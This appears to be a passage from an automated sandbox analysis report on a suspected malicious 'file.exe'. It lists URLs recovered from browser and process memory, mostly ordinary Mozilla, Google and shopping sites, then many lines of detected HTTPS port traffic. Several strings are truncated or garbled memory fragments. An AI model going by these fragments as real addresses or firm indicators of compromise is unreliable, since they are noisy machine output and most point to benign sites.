Source: firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
Source: firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3402637231.00000169D9740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3146184459.00000169D9741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239166770.00000169D9741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 00000021.00000003.3220435804.00000169D9FBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000021.00000003.3377996257.00000169D96CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3325995840.00000169CC22F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3323203512.00000169D3478000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3360156556.00000169CC230000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC230000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3260285389.00000169CC22F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392336336.00000169CAEC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3234415020.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000021.00000003.3112992386.00000169CBEA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3057136407.00000169CBEA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415127213.00000169CBEBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000021.00000003.3325262935.00000169D16A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 00000021.00000003.3386641479.00000169CBCD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: chromecache_259.35.dr String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3377874942.00000169D9792000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3097688805.00000169D9FE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3344209400.00000169CE4BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245256810.00000169D34CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000021.00000003.3097500857.00000169D9821000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000021.00000003.3323676987.00000169D3446000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3095754802.00000169D98FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000021.00000003.3031385964.00000169D9F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000003.3236635003.00000169D97B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000021.00000003.3370039347.00000169CBD06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3385355519.00000169CBD1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000021.00000003.3234415020.00000169D9971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335596207.00000169D39CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000021.00000003.3325995840.00000169CC2C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 00000021.00000003.3228316187.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197600394.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3305729719.00000169CAD1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3263880810.00000169CA0FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000021.00000003.3258417572.00000169CC37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3352717738.00000169CC37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000021.00000003.3386641479.00000169CBCD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 00000021.00000003.3246647026.00000169D1B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp, 5177.bat.23.dr String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=e
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounts
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account~H
Source: firefox.exe, 00000021.00000003.3385355519.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comtype
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000021.00000003.3173677413.00000169CBD19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000021.00000003.3370039347.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3383948586.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 59030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 59029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 58925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
